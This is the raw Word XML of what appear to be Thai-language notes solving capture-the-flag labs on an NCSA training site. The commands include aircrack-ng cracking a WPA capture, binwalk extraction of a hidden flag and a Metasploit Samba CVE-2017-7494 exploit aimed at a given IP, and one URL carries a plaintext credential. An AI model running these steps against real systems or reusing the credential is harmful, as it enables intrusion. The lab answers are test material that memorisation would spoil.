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849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="48F7E47E" w14:textId="77777777">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "https://play.mooc.ncsa.or.th/lab/22"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00126BD6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://play.mooc.ncsa.or.th/lab/22</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="690588B8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t>ของไฟล์</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">หรือ </w:t>
      </w:r>
      <w:r>
        <w:t>download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="145AD79C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="7C0E2A33" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="4675DF03" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57EAA18A" wp14:editId="60B0CA94">
            <wp:extent cx="3766963" cy="3147563"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="21363274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2747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1281" cy="315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9D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="32F952ED" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="21EF29F6" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="6F29905D" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="2894435C" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="5AE8F8C3" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="369C3099" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="21013CAB" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="478132DA" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="4288C104" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="13619EE8" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="2319E5B4" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="338DDF71" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="64C1BC9A" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId6">
        <w:r w:rsidRPr="00126BD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="776D55E1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId7">
        <w:r w:rsidRPr="00805096">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://storage.googleapis.com/secplayground-forensic/network%20lab/wpachallenge.tar.gz</w:t>
        </w:r>
        <w:r w:rsidRPr="00805096">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="cs"/>
            <w:cs/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="00805096">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">หรือกด </w:t>
      </w:r>
      <w:r>
        <w:t>download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="38849532" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t xml:space="preserve"> -d wpachallenge.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="515C6DC3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00587A4F">
        <w:t>tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t>xf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00587A4F">
        <w:t xml:space="preserve"> wpachallenge.tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="61EBC06F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>-ng -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t xml:space="preserve">/share/wordlists/rockyou.txt -b </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A46">
        <w:rPr>
          <w:rFonts w:cs="Cordia New"/>
          <w:cs/>
        </w:rPr>
        <w:t>4:7</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>D:EB</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A46">
        <w:rPr>
          <w:rFonts w:cs="Cordia New"/>
          <w:cs/>
        </w:rPr>
        <w:t>31:10:9</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A46">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>wpachallenge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A46">
        <w:rPr>
          <w:rFonts w:cs="Cordia New"/>
          <w:cs/>
        </w:rPr>
        <w:t>01.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>cap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="2C424010" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">*** </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A46">
        <w:rPr>
          <w:rFonts w:cs="Cordia New"/>
          <w:cs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">ถ้าไม่เจอ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">ต้องไป </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2A46">
        <w:t xml:space="preserve"> -d rockyou.txt.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t>ก่อน</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="04A06235" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA24016" wp14:editId="79587A63">
            <wp:extent cx="4666891" cy="3495681"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="54930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018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1882" cy="349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9D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="17E44E2B" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="2C9782F7" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId9">
        <w:r w:rsidRPr="00126BD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/30</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="4B88122D" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">ทำบน </w:t>
      </w:r>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="3E2E1706" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DAABCDA" wp14:editId="3A1BC592">
            <wp:extent cx="4408098" cy="1309243"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="120827814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78144" name="Picture 1" descr="A computer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2662" cy="131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9D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="09361062" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56774BBA" wp14:editId="39A108AB">
            <wp:extent cx="3881887" cy="2887909"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="1316300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0098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408" cy="289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*** </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">ใช้คำสั่ง </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">เพื่อ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">view </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
        </w:rPr>
        <w:t>ไฟล์</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="7A1F32D9" w14:textId="77777777">
      <w:r w:rsidRPr="001C0488">
        <w:t>https://play.mooc.ncsa.or.th/lab/30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="19EEB854" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71D669C0" wp14:editId="525C1403">
            <wp:extent cx="5048250" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56966674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66745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9D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="76222DFA" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="184ACA42" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="083DF1F7" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="4B7835BF" w14:textId="77777777">
      <w:r w:rsidRPr="00CA2AE5">
        <w:t>https://play.mooc.ncsa.or.th/lab/30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="5DB2AFE2" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9F19CD" wp14:editId="31788E3C">
            <wp:extent cx="5057775" cy="4772025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1504830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3084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9D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="2B126697" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId14">
        <w:r w:rsidRPr="001A778C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/31</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="7BF6817F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C5324">
        <w:t>file crypto5-binwalk.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="3AD2F2C0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C5324">
        <w:t>binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C5324">
        <w:t xml:space="preserve"> -e crypto5-binwalk.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="49B79547" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C5324">
        <w:t>cd _crypto5-binwalk.jpg.extracted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="22E6A35B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C5324">
        <w:t>display secret.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="05159661" w14:textId="77777777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96894B1" wp14:editId="2C1D1C6C">
            <wp:extent cx="2571750" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="567292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9252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9D6" w:rsidP="006849D6" w:rsidRDefault="006849D6" w14:paraId="2836C32F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C0mpr3ss10n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006849D6" w:rsidP="00463A60" w:rsidRDefault="006849D6" w14:paraId="212D9517" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="00463A60" w:rsidRDefault="006849D6" w14:paraId="358C7CF5" w14:textId="77777777"/>
    <w:p w:rsidR="006849D6" w:rsidP="00463A60" w:rsidRDefault="006849D6" w14:paraId="1A460BBC" w14:textId="77777777"/>
    <w:p w:rsidRPr="002B0AE7" w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="41B509BE" w14:textId="69A28144">
      <w:hyperlink w:history="1" r:id="rId16">
        <w:r w:rsidRPr="002B0AE7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/38</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="59438547" w14:textId="77777777">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0009651B">
        <w:t>site:github.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0009651B">
        <w:t xml:space="preserve"> "@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0009651B">
        <w:t>supervalentine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009651B">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="0E5CEB08" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId17">
        <w:r w:rsidRPr="001A778C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://136.110.22.181/?username=sa&amp;credential=JDM82XDVMcNI^wpdW7ZQ5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="6B86FD13" w14:textId="77777777"/>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="005E6830" w14:paraId="014A6588" w14:textId="6B61BD50">
      <w:hyperlink w:history="1" r:id="rId18">
        <w:r w:rsidRPr="00D96AF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/45</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="1E25C0B7" w14:textId="3A8A59DA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="3C7CA186" w14:textId="77777777"/>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="295EE9B3" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId19">
        <w:r w:rsidRPr="00941517">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/46</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="3EF0472C" w14:textId="77777777">
      <w:r w:rsidRPr="00346B03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75FC79FF" wp14:editId="4939069F">
            <wp:extent cx="4019684" cy="4677077"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="10256571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57141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5950" cy="46843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63A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="22E73C00" w14:textId="77777777">
      <w:r w:rsidRPr="00346B03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641702F9" wp14:editId="61DA05B6">
            <wp:extent cx="3823102" cy="4128690"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="24765"/>
            <wp:docPr id="709795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9584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0169" cy="41363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63A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="1BF59DC0" w14:textId="77777777">
      <w:r w:rsidRPr="00346B03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041A0F9B" wp14:editId="76D563C7">
            <wp:extent cx="3901716" cy="1818146"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="10795"/>
            <wp:docPr id="17126014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01449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4033" cy="18238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63A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="38B188BF" w14:textId="77777777">
      <w:r w:rsidRPr="00346B03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7361CB84" wp14:editId="09C97B78">
            <wp:extent cx="3414526" cy="1911551"/>
            <wp:effectExtent l="19050" t="19050" r="14605" b="12700"/>
            <wp:docPr id="1438701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0143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3262" cy="191644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63A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="0DD7D17F" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId24">
        <w:r w:rsidRPr="00941517">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/47</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="4C1F5860" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A71A9A4" wp14:editId="6585D0FE">
            <wp:extent cx="3865615" cy="1780000"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="10795"/>
            <wp:docPr id="933108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0882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4325" cy="17840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63A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="698E2726" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId26">
        <w:r w:rsidRPr="001A778C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/51</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="0D80D990" w14:textId="77777777">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="23272D59" w14:textId="77777777">
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>search CVE-2017-7494</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="3103867A" w14:textId="77777777">
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="6F4AB34F" w14:textId="77777777">
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>set RHOSTS 34.142.247.64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="1FCDD85C" w14:textId="77777777">
      <w:r w:rsidRPr="00AE7E4A">
        <w:t>set RPORT 445</w:t>
      </w:r>
    </w:p>
